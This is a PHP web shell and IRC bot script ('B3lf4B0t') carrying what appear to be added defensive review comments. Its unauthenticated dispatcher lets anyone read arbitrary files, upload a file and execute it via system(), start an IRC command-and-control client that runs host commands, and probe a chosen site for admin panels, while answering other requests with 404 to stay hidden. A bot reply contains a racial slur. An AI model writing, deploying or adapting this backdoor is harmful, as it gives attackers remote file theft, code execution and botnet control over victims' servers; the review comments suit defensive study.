<?php

//php -S localhost:8000

//parse_str(implode('&', array_slice($argv, 1)), $_GET); //tmp

//$_POST['c'] = 'adminpanel';
//$_POST['c_args'] = base64_encode('https://www.enpafirenze.it/cms/');

/////////////////////////////////////////////////////////////////////////////////

// Configuration kept as PHP source text inside a string. Nothing visible in this
// file evaluates it: the only consumer is the commented-out eval() call below, and
// ircbot() hard-codes its own server, channel, nickname and master values.
// NOTE(review): that eval() line would base64_decode() this text first, but the
// text is plain PHP, not base64 — presumably a leftover from an encoded variant.
// For triage, the IRC host, channel and nicknames named here are worth recording
// even though this copy of the script does not read them.
$config = '
	$named_path = "";
	$dropbear_pid = "";
	$tor_pid = "";
	$ngircd_pid = "";
	$irc_pid = "";
	$irc_nickname = "dabot";
	$irc_servers = array("irc.autistici.org:6697");
	$irc_channels = array("#ecc");
	$irc_master = "daMaster";
';

//eval(base64_decode($config));

/**
 * Send $data as a form-encoded HTTP POST to $url and return the response body.
 *
 * 'ignore_errors' is enabled, so the body of a 4xx/5xx reply is returned too
 * instead of file_get_contents() failing on it.
 *
 * @param string $url  Target URL.
 * @param array  $data Field => value pairs, encoded with http_build_query().
 * @return string|false Response body, or false when the request failed or the
 *                      body is falsy (an empty string or "0").
 */
function post_request($url, $data) {
	$http = [
		'method' => 'POST',
		'header' => ["Content-type: application/x-www-form-urlencoded"],
		'content' => http_build_query($data),
		'ignore_errors' => true,
	];
	$body = file_get_contents($url, false, stream_context_create(['http' => $http]));

	// Truthiness test kept as in the original: "" and "0" are reported as false.
	return $body ?: false;
}

/**
 * Fetch the response headers for $url and return the three-character status code.
 *
 * @param string $url URL to request.
 * @return string Characters 9-11 of the first header line, e.g. "404".
 */
function get_http_response_code($url) {
	// Certificate and host-name verification are both switched off, so the answer
	// is accepted from whoever terminates the TLS connection.
	$context = stream_context_create([
		'ssl' => [
			'verify_peer' => false,
			'verify_peer_name' => false
		]
	]);
    // NOTE(review): get_headers() returns false on failure; that case is not
    // handled before $headers[0] is read.
    $headers = get_headers($url, false, $context);
    // Offset 9 assumes a status line of the form "HTTP/1.x NNN ...".
    return substr($headers[0], 9, 3);
}

/**
 * Request $url with each of four fixed path suffixes appended and report the
 * first one whose status code is not "404".
 *
 * Defensive reading: the host running this script issues the requests, so the
 * probes appear in the target's logs with this server's address. The pattern is
 * up to four consecutive requests for cms, admin/, backend and administrator/
 * under one base URL. Any non-404 answer (403, 5xx, a redirect, ...) counts as
 * a hit, so a reported path is not proof that a login page exists.
 *
 * @param string $url          Base URL; suffixes are concatenated without adding a "/".
 * @param string $wordlistfile Unused in this implementation.
 * @return string|false First URL that did not answer 404, or false if all did.
 */
function findadminpanel($url, $wordlistfile='') {
	// Fixed candidate list; $wordlistfile is never read.
	$wordlist  = ['cms', 'admin/', 'backend', 'administrator/'];

	foreach($wordlist as $i) {
		$totest = "$url$i";
		// Loose comparison of the status string against "404".
		if(get_http_response_code($totest) != "404"){
			echo "[SUCCESS] - $totest \n";
			return $totest;
		}	
	}
	return false;
}

/**
 * Stream $file to the HTTP client as an attachment.
 *
 * There is no restriction on $file: any path readable by the PHP process is
 * sent. Nothing visible in this file calls this helper; the GET "download"
 * branch of the dispatcher repeats the same steps inline.
 *
 * @param string $file Path of the file to send.
 * @return void
 */
function download($file) {

	// Only the last path component is shown to the client as the file name.
	$filename = basename($file);
	$mime_type = mime_content_type($file);
	header('Content-type: '.$mime_type);
	header('Content-Disposition: attachment; filename="'.$filename.'"');
	// The full, unvalidated path is what gets read.
	readfile($file);		

}

/**
 * Connect to an IRC server, register a nickname, join the configured channels
 * and then answer chat lines that start with a "!" command. Does not return:
 * it either loops forever or calls exit.
 *
 * Review notes (defensive):
 *  - Leaves ./ngpid.lock in the working directory, holding the PID of the
 *    running instance.
 *  - Server, channel, nickname and master are hard-coded below; the $config
 *    string at the top of the file is not consulted.
 *  - A command is taken from the fourth space-separated token of any received
 *    line. The only check on who sent it is in !slave, and that check only
 *    changes the reply text. !arp and !help additionally require the message
 *    to be addressed to the bot's own nickname.
 *  - !arp runs a host command through system().
 *  - All received traffic is echoed to the script's output.
 *
 * @return void
 */
function ircbot() {
	// Prevent PHP from stopping the script after 30 sec
	set_time_limit(0);

	// Single-instance guard based on a PID stored in a file next to the
	// current working directory.
	$lockfile = './ngpid.lock'; 

	if(!is_file($lockfile)){
		file_put_contents($lockfile, '666666666');     // Seed the lock file with a placeholder PID.
	}

	// posix_getsid() returns false when no process with that PID exists, which
	// is treated here as "previous instance is gone".
	$pid = file_get_contents($lockfile); 
	if (posix_getsid((int)$pid) === false) { 
	   print "process has died! restarting...\n"; 
	   file_put_contents($lockfile, getmypid()); // create lockfile 
	} else { 
	   print "PID " . $pid . " is still alive! can not run twice!\n"; 
	   exit; 
	} 

	// TLS peer and host-name verification are disabled in this context.
	// NOTE(review): the server address below carries no ssl:// or tls:// prefix,
	// so the connection is presumably plain TCP and these options unused — confirm.
	$context = stream_context_create([
		'ssl' => [
		    'verify_peer' => false,
		    'verify_peer_name' => false
		]
	]);

	$channels  = array('#asdasd');
	$nickname = 'c4rl0';
	// $password = 'secret';
	$master   = 'Hammster';
	$servers  = array('127.0.0.1:6697');

	// Try each server in order and keep the first socket that opens.
	foreach($servers as $hostname) {
		$socket = stream_socket_client($hostname, $errno, $errstr, ini_get("default_socket_timeout"), STREAM_CLIENT_CONNECT, $context);
		if ($socket) {
		  echo "connected to " .  $hostname . "\n";
		  break;
		} else {
		  echo 'cant connect to ' .  $hostname . "\n";
		}
	}
	if (! $socket) {
	   echo 'cant connect';
	   exit;
	}

	$connection_tries = 0;
	$connection_registered = false;

	// Registration: send NICK/USER and read replies until the server answers
	// with numeric 001 (welcome).
	while (1) {

		if ($connection_registered) {
		    break;
		}

		fputs($socket, "NICK " . $nickname . "\n");
		fputs($socket, "USER " . $nickname . " 0 * :" . $master . "'s Bot\n");
		    
		// fgets() reads at most 127 bytes per call, so a longer server line is
		// split and its remainder is parsed as if it were a new line.
		while ($data = fgets($socket, 128)) {
		    echo $data;
		    flush();
		    
		    $ex = explode(' ', $data);
		    
		    if ($ex[0] == "PING") {
		        fputs($socket, "PONG " . $ex[1] . "\n");
		    }		    
		    // 433: nickname already in use; retry with a fixed fallback nickname.
		    if ($ex[1] == "433") {
		        $nickname = 'buba';
		        break;
		    }		    
		    // 001: registration accepted.
		    if ($ex[1] == "001") {
		        $connection_registered = true;
		        break;
		    }		    
		    // Give-up check; it is only reached while a line is being processed.
		    if (!$connection_registered && $connection_tries == 5) {
		        echo 'too many tries (' .$connection_tries.')';
		        exit;
		  	}
		}		
		$connection_tries++;
	}

	sleep(2);

	foreach($channels as $channel) {
	   fputs($socket, "JOIN " . $channel . "\n");
	}

	// Force an endless while
	// Once fgets() returns false (for example after the socket closes) the inner
	// loop ends and this outer loop repeats immediately, without any sleep.
	while (1) {
		// Continue the rest of the script here
		while ($data = fgets($socket, 128)) {
		    $is_pvt = false;
		    $sender = '';
		    $recipient = '';
		    
		    echo $data;
		    flush();
		    
		    // Separate all data
		    // As used below: $ex[0] is the sender prefix, $ex[2] the target and
		    // $ex[3] the first word of the message text.
		    $ex = explode(' ', $data);
		    
		    // Send PONG back to the server
		    if ($ex[0] == "PING") {
		        fputs($socket, "PONG " . $ex[1] . "\n");
		    }
		    
		    // executes chat command
		    if ($ex[0] != 'PING' && ISSET($ex[3])) {
		        // Strip LF and CR so the command word compares cleanly.
		        $command = str_replace(array(
		            chr(10),
		            chr(13)
		        ), '', $ex[3]);
		        
		        // A message whose target is the bot's nickname is a private
		        // message: reply to the sender. Otherwise reply to the target
		        // (the channel).
		        if($ex[2] == $nickname) {
		            $sender = explode('!', $ex[0]);
		            $sender = str_replace(':', '', $sender);
		            $is_pvt = true;
		            $recipient = $sender[0];
		        } else {
		            $recipient = $ex[2];
		        }
		                    
		        // !md5 <word>: reply with the MD5 hex digest of the next token.
		        // No sender check.
		        if($command == ":!md5") {
		            if (ISSET($ex[4])) {
		                $ex[4] = preg_replace('~(*BSR_ANYCRLF)\R~', "", $ex[4]);
		                $hashed = hash('md5', $ex[4]);
		                fputs($socket, "PRIVMSG " . $recipient . " :" . $hashed . " \n");
		            } else {
		                fputs($socket, "PRIVMSG " . $recipient . " :[ERROR] missing argument \n");
		            }
		        }            
		        // !arp (private message only): runs a fixed host command. The
		        // sender is not compared with $master. system() prints the command
		        // output to this script's own output and returns only its last
		        // line, which is what gets relayed.
		        if($is_pvt && $command == ":!arp") {
		            $out = system('arp -a');
		            foreach(preg_split("/((\r?\n)|(\r\n?))/", $out) as $line){
		                fputs($socket, "PRIVMSG " . $recipient . " :" . $line . " \n");
		            } 
		        }
		        if ($command == ":!alive?") {
		            fputs($socket, "PRIVMSG " . $recipient . " :whazzup nigga? \n");
		        }
		        if ($command == ":!time") {
		            fputs($socket, "PRIVMSG " . $recipient . " :" . date(DATE_RFC2822) . " \n");
		        }
		        // !help (private message only): banner and command list.
		        if ($is_pvt && $command == ":!help") {
		            fputs($socket, "PRIVMSG " . $recipient . " :B3lf4B0t v. 0.1 - E.C.C. - Evil Computer Club \n");
		            fputs($socket, "PRIVMSG " . $recipient . " :!alive?, !time, !slave, !md5, !arp \n");
		        }
		        // !slave: the only place the sender's nickname is compared with
		        // $master; the result only selects the reply text.
		        if ($command == ":!slave") {
		            
		            $parts = explode("!", $ex[0]);
		            $user  = substr($parts['0'], 1);
		            
		            if ($user == $master)
		                fputs($socket, "PRIVMSG " . $recipient . " :Yes master! \n");
		            else
		                fputs($socket, "PRIVMSG " . $recipient . " :get lost " . $user . " you filthy infidel! \n");
		        }		        
		        // !crackmd5: only echoes the recipient and arguments locally;
		        // nothing is sent back to IRC.
		        if ($command == ":!crackmd5") {
		            echo "$recipient \n";
		            if (ISSET($ex[4])) {
						echo implode(' ', array_slice($ex, 4, -1));
					}
		        } //if ($is_pvt && $command == ":!crackmd5")
		        
		    } //if ($ex[0] != 'PING' && ISSET($ex[3]))
		} //while ($data = fgets($socket, 128))
	} //while(1)
} //function ircbot() 


//main


// Request dispatcher. The action is chosen by the "c" parameter (GET first, then
// POST) and no branch performs any authentication, so every action below is
// available to anyone who can reach this script.
//
// Review notes (defensive): in web-server logs this shows up as requests to one
// PHP file with c=irc, c=upload or c=download in the query string, or as POSTs
// to that file; every other request is answered with 404. Hosting this file
// amounts to remote file read, file write and command execution with the
// privileges of the PHP process.
if(isset($_GET['c'])) {
    $cmd = $_GET['c'];
    
    // Starts the IRC client inside this request; ircbot() does not return.
    if ( $cmd == 'irc') {
        ircbot();
    } 
    
    // Renders the upload form, which posts back to this same script.
    if ( $cmd == 'upload') {
        echo '
        <!DOCTYPE html>
        <html>
        <head>
          <title>Upload your files</title>
        </head>
        <body>
          <form enctype="multipart/form-data" action="' . basename($_SERVER["SCRIPT_FILENAME"]) . '" method="POST">
            <p>Upload your file</p>
            <input type="hidden" name="c" value="upload"></input>
            <input type="file" name="uploaded_file"></input><br />
            <input type="checkbox" name="exec" value="exec"> Exec after upload</input><br />            
            <input type="submit" value="Upload"></input>
          </form>
        </body>
        </html>';
    }

    // Sends the file named by "f" as an attachment. The path is used as given,
    // so any file readable by the PHP process can be retrieved.
    if ( $cmd == 'download') {
		if (isset($_GET['f']) && !empty($_GET['f'])) {
			$f = $_GET['f'];
			$filename = basename($f);
			$mime_type = mime_content_type($f);
			header('Content-type: '.$mime_type);
			header('Content-Disposition: attachment; filename="'.$filename.'"');
			readfile($f);		
		}
    }
} 
elseif (isset($_POST['c'])) {
	$cmd = $_POST['c'];

    // Stores the uploaded file in the current directory under its client-supplied
    // base name, with no check of type or content, marks it executable and, when
    // the "exec" field is set, runs it through system().
    if ( $cmd == 'upload') {
		if (!empty($_FILES['uploaded_file'])) {
			$path = "./";
			$path = $path . basename( $_FILES['uploaded_file']['name']);

			if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
				echo'<pre>';
				echo "The file ".  basename( $_FILES['uploaded_file']['name']). " has been uploaded \n";
			if (chmod($path, 0755)) {
				echo "Chmod +x done \n";
			}
			if (isset($_POST['exec'])) {
				if ($_POST['exec'] == "exec") {
					echo $path;
					system('./'.$path);
					//system('ls -al');
				}
			}
			echo'</pre>';
			} else{
				echo "There was an error uploading the file, please try again!";
			}
		}
	}

    // c_args is a base64-encoded base URL handed to findadminpanel(), so this
    // host sends HTTP requests to a destination chosen by the caller.
    if ( $cmd == 'adminpanel') {
		if (!empty($_POST['c_args'])) {
			$c_args = base64_decode($_POST['c_args']);
			findadminpanel($c_args);
		} else {
			http_response_code(404);
			exit;
		}
	}

    // NOTE(review): hashkiller() is not defined anywhere in the visible file;
    // unless it is provided elsewhere, this branch ends in a fatal error.
    if ( $cmd == 'hashkiller') {
		if (!empty($_POST['c_args'])) {
			$c_args = base64_decode($_POST['c_args']);
			hashkiller($c_args);
		} else {
			http_response_code(404);
			exit;
		}
	}
	
} 
else {
    // Without a "c" parameter the script answers 404 — presumably so that it
    // looks like a missing page to a casual visitor; confirm.
    http_response_code(404);
}


?>
